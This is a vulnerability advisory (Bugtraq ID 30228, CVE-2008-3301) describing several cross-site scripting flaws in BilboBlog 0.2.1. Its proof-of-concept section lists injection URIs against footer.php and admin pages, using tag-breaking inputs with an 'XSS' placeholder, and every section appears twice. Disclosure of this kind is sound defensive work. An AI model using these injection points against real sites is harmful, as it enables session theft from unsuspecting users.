BilboBlog Multiple Cross-Site Scripting Vulnerabilities
BID:30228
Info
BilboBlog Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 30228 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3301 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 14 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Black_H <[email protected]> |
| Vulnerable: |
Tux-planet BliboBlog 0.2.1 |
| Not Vulnerable: | |
Discussion
BilboBlog Multiple Cross-Site Scripting Vulnerabilities
BilboBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BilboBlog 0.2.1 is vulnerable; other versions may also be affected.
BilboBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BilboBlog 0.2.1 is vulnerable; other versions may also be affected.
Exploit / POC
BilboBlog Multiple Cross-Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS
http://www.example.com/bilboblog/admin/?content=</textarea>XSS
http://www.example.com/bilboblog/admin/homelink.php?url=">XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/bilboblog/footer.php?t_lang[lang_copyright]=XSS
http://www.example.com/bilboblog/admin/?content=</textarea>XSS
http://www.example.com/bilboblog/admin/homelink.php?url=">XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_help]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_clear_cache]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_home]=XSS
http://www.example.com/bilboblog/admin/homelink.php?t_lang[lang_admin_logout]=XSS
Solution / Fix
BilboBlog Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].